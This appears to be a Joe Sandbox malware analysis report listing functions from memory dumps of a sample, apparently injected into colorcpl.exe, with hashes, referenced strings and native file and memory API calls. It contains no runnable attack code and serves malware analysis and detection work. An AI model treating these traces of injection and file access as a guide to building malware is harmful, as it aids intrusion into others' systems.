Instruction ID: e2857321b6a0e0703296dd235467d5d8ec318ab9e82c0d341a470d5e26972025
Opcode Fuzzy Hash: 899afa417a9ffd83116003d9eefa89735f5e60e051fcad56c814bd971a9d4ca0
Instruction Fuzzy Hash: 1790026125150842D1407158841470B000AD7D0601F55C011A5024558DC6168EA567B1

Function 012539B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e9a5e10a04c1f9abe1d054bcc0e10a68f332c7f7cad5a2459ef0a0f1f849fa
Instruction ID: a54e9c4cc8dc9e8a3bccabed399403143926277d91ae93ca13bc74d8bd16a162
Opcode Fuzzy Hash: b9e9a5e10a04c1f9abe1d054bcc0e10a68f332c7f7cad5a2459ef0a0f1f849fa
Instruction Fuzzy Hash: 0F90026125555142D150715C440461A4009B7E0201F55C021A5814598DC5558D956321

Function 01253D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbac0de4ea1c81048376ac500c58c9c6f082b895b44e9e1f144dc4a1f574a16
Instruction ID: e9a19c67624a4e28db2193a15673eb7476526a9714ed855faf6a67cde563a45a
Opcode Fuzzy Hash: 4fbac0de4ea1c81048376ac500c58c9c6f082b895b44e9e1f144dc4a1f574a16
Instruction Fuzzy Hash: 6A90027121250182954072585804A4E410997E1302B95D415A5015558CC9148DA15321

Function 01253D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b826f6a86a7cf08034e7f21b497b3b5309517b39692f2d64916fd3cf91a0403
Instruction ID: 0977193c4c3ed2e101220a1480ed9e0467fe5206fff38e5c5b78e62d86674a1f
Opcode Fuzzy Hash: 5b826f6a86a7cf08034e7f21b497b3b5309517b39692f2d64916fd3cf91a0403
Instruction Fuzzy Hash: EC90027521150442D5107158580464A004A97D0301F55D411A542455CDC6548DE1A221

Function 01252C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 82197116f8334ac40cc408a478e3713dc8fec5e1a0314284f04f41833dd3c5f4
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01252890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0125293C
___swprintf_l.LIBCMT ref: 0125295E
___swprintf_l.LIBCMT ref: 012529A3
___swprintf_l.LIBCMT ref: 0128A52E

Strings

:%u.%u.%u.%u, xrefs: 0128A5B8
::%hs%u.%u.%u.%u, xrefs: 0128A527
::ffff:0:%u.%u.%u.%u, xrefs: 0128A54E
ffff:, xrefs: 0128A504

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 791a1af263e20ae3bd609712f335c5752ad5e523cb559d6125f33af323f2d876
Instruction ID: 91caa3499c2b9921afbe61d6bf2d0a7ae3ec2df3398b3d4cb587cb243f15c637
Opcode Fuzzy Hash: 791a1af263e20ae3bd609712f335c5752ad5e523cb559d6125f33af323f2d876
Instruction Fuzzy Hash: 6C51E4B6A24117EFCB55DB9C89C097EFBB8BB08240714822AE965D7681D774DE4087A0

Function 012C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 012C24A6
___swprintf_l.LIBCMT ref: 012C24E2
___swprintf_l.LIBCMT ref: 012C257D
___swprintf_l.LIBCMT ref: 012C25A3
___swprintf_l.LIBCMT ref: 012C25C8
___swprintf_l.LIBCMT ref: 012C2608

Strings

::%hs%u.%u.%u.%u, xrefs: 012C249E
:%u.%u.%u.%u, xrefs: 012C25FF
::ffff:0:%u.%u.%u.%u, xrefs: 012C24DA
ffff:, xrefs: 012C247D, 012C249D

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f72a8d943ff2fc3a9713c4c7b502db07eadef5c42461372ada01cf4b2625f133
Instruction ID: d07549efe902843016ce86fe5393f1c662a40d0e44994c7d0ae4b8b50af5d66e
Opcode Fuzzy Hash: f72a8d943ff2fc3a9713c4c7b502db07eadef5c42461372ada01cf4b2625f133
Instruction Fuzzy Hash: AF512775A20646EFCB35CF5CC88087FFBF8EF54640B00855EE696D3682DAB0DA408760

Function 01247630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01284742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01284655
ExecuteOptions, xrefs: 012846A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012846FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01284725
Execute=1, xrefs: 01284713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01284787

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 036ff1d12e8a1155b3184a2653dd19e3d4beaaa71ddc87573f37ead2dc05f6d5
Instruction ID: 9f98f5f4e352539d1c0bb7352ef6f35aba5f407ec29c1bdf07aed5c73bb94b10
Opcode Fuzzy Hash: 036ff1d12e8a1155b3184a2653dd19e3d4beaaa71ddc87573f37ead2dc05f6d5
Instruction Fuzzy Hash: 14511731A2025ABFEF29FAA9DC85FBE77ADEF14304F040099DA15A71C1E7709A458F50

Function 0125B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0125B6BF

Strings

0, xrefs: 0125B695
0, xrefs: 0125B66F
+, xrefs: 0125B65A
-, xrefs: 0125B650

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 965fae88967aa7fadc35bdd36069122d66030802a5581f9db81579636264533e
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 2081B071E3524A9EEF698E6CC8D17FEBBA3AF45320F184159DE61A72D1C7348840CB61

Function 012C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 012C214F
___swprintf_l.LIBCMT ref: 012C2172

Strings

%%%u, xrefs: 012C2146
[, xrefs: 012C212B
]:%u, xrefs: 012C2169

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 35717cb591807c0ceefe2e352e70bce730c5e3f3097253c6998d0c77c8a13ef6
Instruction ID: ef8bdc331abf2e8becac08c53d3b91aa55f73e734053b32764cbc1de0976da45
Opcode Fuzzy Hash: 35717cb591807c0ceefe2e352e70bce730c5e3f3097253c6998d0c77c8a13ef6
Instruction Fuzzy Hash: 1C21567AA2011ADBDB11DE69CC409BEBBFCEF94644F04021AEB05E3241EB7099018BA1

Function 0123F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0128031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012802BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012802E7

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: ce37508cc50e673b578b619774a104218380df3ebc3d313aea85388db081e879
Instruction ID: b4a70c3381872435b62e74c12e36ae947324f20944fb368f5ee2b3c77e222440
Opcode Fuzzy Hash: ce37508cc50e673b578b619774a104218380df3ebc3d313aea85388db081e879
Instruction Fuzzy Hash: B9E1C070A24742DFE725DF28D985B2ABBE0BB84314F140A5DF6A5CB2E1D774D848CB42

Function 0124BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01287B8E
RTL: Re-Waiting, xrefs: 01287BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01287B7F

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 90368266ec6ff1e0b28ccdefc3f9eb90a065b132e1dcfefe9489f3d9c485d833
Instruction ID: ce1506990bcc5a6e3c606231fffc95f86057350ff48b9df0261326957ffd7537
Opcode Fuzzy Hash: 90368266ec6ff1e0b28ccdefc3f9eb90a065b132e1dcfefe9489f3d9c485d833
Instruction Fuzzy Hash: 434124357217039FDB29DE29C941B2AB7E5EF98710F100A1DFA5ADB280DB71E805CB91

Function 0124B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0128728C

Strings

RTL: Resource at %p, xrefs: 012872A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01287294
RTL: Re-Waiting, xrefs: 012872C1

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 8ef667b6fc1bc89c31f5f162a7e16439d01b2ae6a114b9940b763231e7cf1165
Instruction ID: 9eacc0c29e6b1e76ec0d9e58eca6019f76b73e8e25c69745d8d04a1d92be8c8c
Opcode Fuzzy Hash: 8ef667b6fc1bc89c31f5f162a7e16439d01b2ae6a114b9940b763231e7cf1165
Instruction Fuzzy Hash: CA41F035661203ABDB25EE29CC41B66BBA5FB94710F200619FE55EB280DB31E852CBD1

Function 012C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 012C238D
___swprintf_l.LIBCMT ref: 012C23B3

Strings

%%%u, xrefs: 012C2384
]:%u, xrefs: 012C23AA

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: d9575b2c52aafffbf42c29bb6013e9e059ccbd9d3d0eba2ce12c5fd6aa09f7e7
Instruction ID: 9341c93cd817b45b9d8f826b23555c4365af1e2b9301f4733848301bc386d4f9
Opcode Fuzzy Hash: d9575b2c52aafffbf42c29bb6013e9e059ccbd9d3d0eba2ce12c5fd6aa09f7e7
Instruction Fuzzy Hash: 3E315772620119DFDB21DF29DC40BFEB7F8FB54610F44459AEA49E3240EF309A549B60

Function 01257D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01257E8B

Strings

-, xrefs: 01257DDD
+, xrefs: 01257DE8

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 4ae0482b05ab8b2d6285d22830b62db03794b62640541450e3d49402d684f9cd
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 9E91D270EA02079BEFA4DF6DC8C1ABEBBA5BF44320F94451AEE55E72C0E77089408711

Function 01219126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01219191
@, xrefs: 01219175

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 94a65c59daebcc48f46851c736d1b79966e735a820168fa6a559fa1cc58ec16c
Instruction ID: 69cc35d6e7571ca55245ea9df21fd23d215e238bd75cb107da114d762d811b50
Opcode Fuzzy Hash: 94a65c59daebcc48f46851c736d1b79966e735a820168fa6a559fa1cc58ec16c
Instruction Fuzzy Hash: 8F812B71D1026ADBDB35CB54CC55BEEB7B8AB48714F0041EAEA19B7280D7709E84CFA4

Analysis Process: colorcpl.exePID: 5840, Parent PID: 4288COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.1%
Signature Coverage:	2.2%
Total number of Nodes:	464
Total number of Limit Nodes:	80

Executed Functions

Function 032F9DC0 Relevance: 21.5, Strings: 17, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 032F9F9E
5z4, xrefs: 032FA14F
Mu, xrefs: 032F9ED0
0, xrefs: 032F9E83
z, xrefs: 032F9E46
^, xrefs: 032F9E79
}, xrefs: 032F9FD1
w, xrefs: 032F9E0C
v, xrefs: 032F9E38
?, xrefs: 032F9FBD
K5, xrefs: 032F9F02
/, xrefs: 032F9E8D
D, xrefs: 032F9E3F
Lt, xrefs: 032F9F6F
^[, xrefs: 032F9F4A
z4, xrefs: 032F9F17
XW, xrefs: 032F9F8D

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID:
String ID: /$0$?$D$K5$Lt$Mu$XW$^$^[$v$z$z4$}$'$5z4$w
API String ID: 0-2045270831
Opcode ID: 42e1329e87a7dd64e61753fd3a668a862240e802b94d7263a4071ddf8b5b28b0
Instruction ID: 1c1ea9db2b41879a04d9274eb54c40c7574bba156cef7efe574e1d61212c2231
Opcode Fuzzy Hash: 42e1329e87a7dd64e61753fd3a668a862240e802b94d7263a4071ddf8b5b28b0
Instruction Fuzzy Hash: 1CF1ADB0D15229CFEB24CF95C994BEDFBB1BF44308F2081A9D5096B281D7B56A89CF40

Function 0330C3B0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0330C494
FindNextFileW.KERNELBASE(?,00000010), ref: 0330C4CF
FindClose.KERNELBASE(?), ref: 0330C4DA

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 0c02a8ca265d129e42cc71690012151faf97ecebfd056058fb98977b22bd933c
Instruction ID: 761329515d191d18bb3c86657735334114e169544c267a76c3c5274991f388be
Opcode Fuzzy Hash: 0c02a8ca265d129e42cc71690012151faf97ecebfd056058fb98977b22bd933c
Instruction Fuzzy Hash: 9F318575E40308BBDB61EF60CC95FFFB77CEB44704F144558B509AB180DAB0AA948BA0

Function 03318EC0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03318FBE

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
Instruction ID: f2ad90e6ae64a7b99bda1012d11d432fa6d6fafe3cb69929d29cebe3209f533b
Opcode Fuzzy Hash: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
Instruction Fuzzy Hash: 1E31E6B5A01248AFDB14DF98D881EDEB7B9EF8C304F108119F919AB340D774A851CBA4

Function 03319030 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03319116

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
Instruction ID: 5b6e5ac508360fa645434ae7c2a36c67d4abd465ca6bffb065f3eec9e8945663
Opcode Fuzzy Hash: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
Instruction Fuzzy Hash: 7131E8B5A00248AFDB14DF98D881EDFB7B9EF88314F108219F919AB340D774A851CFA5

Function 03319320 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(03301B8E,?,03317E0E,00000000,00000004,00003000,?,?,?,?,?,03317E0E,03301B8E), ref: 033193EB

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 791fe5aee6c4ccce90167758e625808fa971abe00af37c983824597c540c284e
Instruction ID: c6150a8d23590a22a1edf68ef8465bdc68dbee33290b7cf9e6897af64d4d2e4b
Opcode Fuzzy Hash: 791fe5aee6c4ccce90167758e625808fa971abe00af37c983824597c540c284e
Instruction Fuzzy Hash: 2D211EB5A00309AFDB14DF58DC81EEFB7B9EF88314F008519F919AB240D774A921CBA1

Function 03319120 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 033191B6

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 876a2cd22cab806990b3ef133206fa3bee5b983be8e20418055e3e13876e6c4c
Instruction ID: 6a63612eb54e4faecadd95e8497c30f95cc3f9c18da0afc47026a1a7ffdfe3af
Opcode Fuzzy Hash: 876a2cd22cab806990b3ef133206fa3bee5b983be8e20418055e3e13876e6c4c
Instruction Fuzzy Hash: C9119E75A00708BED620EA64CC41FEBB76CDF85614F408509FA18AB280D7B57525CBA1

Function 033191C0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 033191F4

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction ID: 64553a343d9b2bf8566bcb5c4e01d7abb20960c0a4c6380af5145148a34e9680
Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction Fuzzy Hash: B9E086766002047FD610FA59DC41F97775CDFC5764F408015FA08AB281C675792087F5

Function 05234650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0523465A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9aa0813022ac19d03eb8b37b5d40d4e784eb6541671356662bfc764afbf447e
Instruction ID: f92da473a233aa2714567a99f7ed5cd90025671983beb12a532ed3e3fec07dae
Opcode Fuzzy Hash: e9aa0813022ac19d03eb8b37b5d40d4e784eb6541671356662bfc764afbf447e
Instruction Fuzzy Hash: E19002626215104241447158484440660159BE13013D5C115A1554560C869889559669

Function 05234340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0523434A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0636c0683db8dc7c427a553102b2e8e6d9dd48f0030292b1b5f2fb1a75f16c56
Instruction ID: 33d0c36e4abcc10f4c462dbd19174ed328046615c7153309ebff5abd78606f5b
Opcode Fuzzy Hash: 0636c0683db8dc7c427a553102b2e8e6d9dd48f0030292b1b5f2fb1a75f16c56
Instruction Fuzzy Hash: 1D900232625810129144715848C454640159BE0301B95C011E1424554C8A948A565761

Function 05232D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232D3A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 76028f3887ada302ff0f56eb9010d1d311c6970472cda5deb765f28a0005b7db
Instruction ID: d1d2abb2b1a8ce64bc9799bbaabb122bd1bd990c54de5fe4b6a0f4a77384aa4b
Opcode Fuzzy Hash: 76028f3887ada302ff0f56eb9010d1d311c6970472cda5deb765f28a0005b7db
Instruction Fuzzy Hash: 6090022232141003D144715854586064015DBE1301F95D011E1414554CD99589565622

Function 05232D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232D1A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 296caa9db9c14ce0b927523d5b2699c055b1b44f0ba9a1a2a483ffd1ac97e49b
Instruction ID: 4302f87a58ebc0df26c71c92187904d10383ab3f4df02db86f47c839382d8dc2
Opcode Fuzzy Hash: 296caa9db9c14ce0b927523d5b2699c055b1b44f0ba9a1a2a483ffd1ac97e49b
Instruction Fuzzy Hash: AA90022A23341002D1847158544860A00158BD1202FD5D415A1015558CC99589695721

Function 05232DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232DFA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
